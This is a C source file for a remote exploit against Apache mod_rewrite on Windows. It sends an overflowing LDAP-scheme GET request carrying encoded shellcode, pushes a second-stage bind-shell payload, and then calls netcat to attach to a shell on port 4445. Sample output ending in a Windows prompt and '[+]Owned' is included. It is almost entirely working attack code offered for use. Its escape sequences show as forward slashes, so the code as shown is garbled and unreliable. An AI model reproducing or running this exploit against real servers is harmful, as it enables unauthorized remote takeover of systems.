/*
apache mod rewrite exploit (win32)
By: fabio/b0x (oc-192, old CoTS member)
Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)
original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also
was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/
Usage: ./apache hostname rewrite_path
Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard
Example: ./apache 192.168.0.253 test
[+]Preparing payload
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Starting second stage...
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Connecting to shell
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:/Program Files/Apache Group/Apache2>exit
exit
[+]Owned
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define PORT 80
#define PORT2 4444
#define MAXDATASIZE 1024
char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
char shellcode[]=
"/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x49/x49/x49/x49/x49/x49"
"/x48/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x51/x5a/x6a/x41"
"/x58/x50/x30/x42/x30/x41/x6b/x41/x41/x51/x41/x32/x41/x41/x32/x42"
"/x42/x42/x30/x42/x41/x58/x38/x41/x42/x50/x75/x7a/x49/x4b/x58/x56"
"/x36/x73/x30/x43/x30/x75/x50/x70/x53/x66/x35/x70/x56/x31/x47/x4c"
"/x4b/x50/x6c/x44/x64/x55/x48/x6c/x4b/x73/x75/x75/x6c/x4c/x4b/x61"
"/x44/x73/x35/x63/x48/x35/x51/x4b/x5a/x6c/x4b/x50/x4a/x37/x68/x6c"
"/x4b/x42/x7a/x77/x50/x37/x71/x4a/x4b/x6b/x53/x44/x72/x30/x49/x6e"
"/x6b/x44/x74/x6e/x6b/x56/x61/x68/x6e/x54/x71/x39/x6f/x6b/x4c/x70"
"/x31/x4b/x70/x6c/x6c/x67/x48/x6b/x50/x54/x34/x53/x37/x6b/x71/x68"
"/x4f/x44/x4d/x73/x31/x78/x47/x38/x6b/x38/x72/x45/x6b/x73/x4c/x31"
"/x34/x46/x74/x52/x55/x6b/x51/x6c/x4b/x63/x6a/x65/x74/x56/x61/x7a"
"/x4b/x32/x46/x4c/x4b/x76/x6c/x70/x4b/x4e/x6b/x30/x5a/x75/x4c/x67"
"/x71/x5a/x4b/x6e/x6b/x74/x44/x4e/x6b/x57/x71/x6b/x58/x68/x6b/x76"
"/x62/x50/x31/x4b/x70/x33/x6f/x53/x6e/x31/x4d/x63/x6b/x4b/x72/x65"
"/x58/x55/x50/x61/x4e/x31/x7a/x36/x50/x42/x79/x70/x64/x4e/x6b/x74"
"/x59/x6e/x6b/x43/x6b/x44/x4c/x4c/x4b/x51/x4b/x77/x6c/x4c/x4b/x35"
"/x4b/x6e/x6b/x31/x4b/x74/x48/x73/x63/x63/x58/x6c/x4e/x70/x4e/x44"
"/x4e/x78/x6c/x79/x6f/x4b/x66/x4d/x59/x6f/x37/x4b/x31/x78/x6c/x33"
"/x30/x77/x71/x73/x30/x47/x70/x36/x37/x53/x66/x51/x43/x4d/x59/x69"
"/x75/x39/x78/x56/x47/x57/x70/x37/x70/x37/x70/x6e/x70/x45/x51/x33"
"/x30/x37/x70/x4c/x76/x72/x39/x55/x48/x7a/x47/x6d/x74/x45/x49/x54"
"/x30/x4d/x39/x38/x65/x77/x39/x4b/x36/x50/x49/x6c/x64/x35/x4a/x52"
"/x50/x4f/x37/x6c/x64/x4c/x6d/x76/x4e/x4d/x39/x4b/x69/x45/x59/x49"
"/x65/x4e/x4d/x78/x4b/x4a/x4d/x6b/x4c/x77/x4b/x31/x47/x50/x53/x74"
"/x72/x61/x4f/x46/x53/x67/x42/x57/x70/x61/x4b/x6c/x4d/x42/x6b/x75"
"/x70/x70/x51/x6b/x4f/x7a/x77/x4b/x39/x4b/x6f/x4f/x79/x4f/x33/x4e"
"/x6d/x71/x65/x52/x34/x53/x5a/x53/x37/x30/x59/x50/x51/x66/x33/x4b"
"/x4f/x55/x64/x4c/x4f/x6b/x4f/x66/x35/x43/x34/x50/x59/x6e/x69/x47"
"/x74/x6c/x4e/x6a/x42/x58/x72/x54/x6b/x64/x67/x72/x74/x39/x6f/x76"
"/x57/x6b/x4f/x50/x55/x44/x70/x30/x31/x4b/x70/x50/x50/x30/x50/x50"
"/x50/x32/x70/x77/x30/x46/x30/x53/x70/x70/x50/x49/x6f/x63/x65/x66"
"/x4c/x4b/x39/x4f/x37/x30/x31/x6b/x6b/x33/x63/x71/x43/x42/x48/x54"
"/x42/x63/x30/x76/x71/x63/x6c/x4c/x49/x6d/x30/x52/x4a/x32/x30/x32"
"/x70/x36/x37/x59/x6f/x52/x75/x71/x34/x50/x53/x70/x57/x4b/x4f/x72"
"/x75/x44/x68/x61/x43/x62/x74/x33/x67/x59/x6f/x63/x65/x67/x50/x4c"
"/x49/x38/x47/x6d/x51/x5a/x4c/x53/x30/x36/x70/x53/x30/x33/x30/x4e"
"/x69/x4b/x53/x53/x5a/x43/x30/x72/x48/x53/x30/x34/x50/x33/x30/x33"
"/x30/x50/x53/x76/x37/x6b/x4f/x36/x35/x74/x58/x6e/x61/x4a/x4c/x67"
"/x70/x35/x54/x33/x30/x63/x30/x49/x6f/x78/x53/x41";
char finish[]= "HTTP/1.0/r/nHost: ";
char payload2[]=
"/x31/xc9/x83/xe9/xb0/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x18"
"/xd9/x03/x3a/x83/xeb/xfc/xe2/xf4/xe4/xb3/xe8/x77/xf0/x20/xfc/xc5"
"/xe7/xb9/x88/x56/x3c/xfd/x88/x7f/x24/x52/x7f/x3f/x60/xd8/xec/xb1"
"/x57/xc1/x88/x65/x38/xd8/xe8/x73/x93/xed/x88/x3b/xf6/xe8/xc3/xa3"
"/xb4/x5d/xc3/x4e/x1f/x18/xc9/x37/x19/x1b/xe8/xce/x23/x8d/x27/x12"
"/x6d/x3c/x88/x65/x3c/xd8/xe8/x5c/x93/xd5/x48/xb1/x47/xc5/x02/xd1"
"/x1b/xf5/x88/xb3/x74/xfd/x1f/x5b/xdb/xe8/xd8/x5e/x93/x9a/x33/xb1"
"/x58/xd5/x88/x4a/x04/x74/x88/x7a/x10/x87/x6b/xb4/x56/xd7/xef/x6a"
"/xe7/x0f/x65/x69/x7e/xb1/x30/x08/x70/xae/x70/x08/x47/x8d/xfc/xea"
"/x70/x12/xee/xc6/x23/x89/xfc/xec/x47/x50/xe6/x5c/x99/x34/x0b/x38"
"/x4d/xb3/x01/xc5/xc8/xb1/xda/x33/xed/x74/x54/xc5/xce/x8a/x50/x69"
"/x4b/x8a/x40/x69/x5b/x8a/xfc/xea/x7e/xb1/x12/x67/x7e/x8a/x8a/xdb"
"/x8d/xb1/xa7/x20/x68/x1e/x54/xc5/xce/xb3/x13/x6b/x4d/x26/xd3/x52"
"/xbc/x74/x2d/xd3/x4f/x26/xd5/x69/x4d/x26/xd3/x52/xfd/x90/x85/x73"
"/x4f/x26/xd5/x6a/x4c/x8d/x56/xc5/xc8/x4a/x6b/xdd/x61/x1f/x7a/x6d"
"/xe7/x0f/x56/xc5/xc8/xbf/x69/x5e/x7e/xb1/x60/x57/x91/x3c/x69/x6a"
"/x41/xf0/xcf/xb3/xff/xb3/x47/xb3/xfa/xe8/xc3/xc9/xb2/x27/x41/x17"
"/xe6/x9b/x2f/xa9/x95/xa3/x3b/x91/xb3/x72/x6b/x48/xe6/x6a/x15/xc5"
"/x6d/x9d/xfc/xec/x43/x8e/x51/x6b/x49/x88/x69/x3b/x49/x88/x56/x6b"
"/xe7/x09/x6b/x97/xc1/xdc/xcd/x69/xe7/x0f/x69/xc5/xe7/xee/xfc/xea"
"/x93/x8e/xff/xb9/xdc/xbd/xfc/xec/x4a/x26/xd3/x52/xe8/x53/x07/x65"
"/x4b/x26/xd5/xc5/xc8/xd9/x03/x3a";
int main(int argc, char *argv[])
{
int sockfd, numbytes;
char buf[MAXDATASIZE];
struct hostent *he;
struct sockaddr_in their_addr;
printf(" Exploit: apache mod rewrite exploit (win32)/n"
" By: fabio/b0x (oc-192, old CoTS member)/n"
"Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard/n"
);
if (argc != 3) {
printf(" Usage: ./apache hostname rewrite_path/n");
exit(1);
}
printf("/n[+]Preparing payload/n");
char payload[748];
sprintf(payload,"GET /%s%s%s%s%s/r/n/r/n/0",argv[2],get,shellcode,finish,argv[1]);
printf("[+]Connecting.../n");
if ((he=gethostbyname(argv[1])) == NULL) {
printf("[-]Cannot resolv hostname.../n");
exit(1);
}
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-]Socket error.../n");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(their_addr.sin_zero, '/0', sizeof their_addr.sin_zero);
if (connect(sockfd, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) == -1) {
printf("[-]Unable to connect/n");
exit(1);
}
printf("[+]Connected/n[+]Sending.../n");
if (send(sockfd, payload, strlen(payload), 0) == -1){
printf("[-]Unable to send/n");
exit(1);
}
printf("[+]Sent/n");
close(sockfd);
printf("[+]Starting second stage.../n");
sleep(3);
printf("[+]Connecting.../n");
if ((he=gethostbyname(argv[1])) == NULL) {
printf("[-]Cannot resolv hostname.../n");
exit(1);
}
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-]Socket error.../n");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT2);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(their_addr.sin_zero, '/0', sizeof their_addr.sin_zero);
if (connect(sockfd, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) == -1) {
printf("[-]Unable to connect/n");
exit(1);
}
printf("[+]Connected/n[+]Sending.../n");
if (send(sockfd, payload2, strlen(payload2), 0) == -1){
printf("[-]Unable to send/n");
exit(1);
}
printf("[+]Sent/n[+]Connecting to shell/n");
close(sockfd);
sleep(3);
int exec;
char what[1024];
sprintf(what," nc -w 10 %s 4445",argv[1]);
exec=system(what);
if (exec!=0){
printf("[-]Not hacked/n");
} else {
printf("[+]Owned/n");
}
exit(1);
}
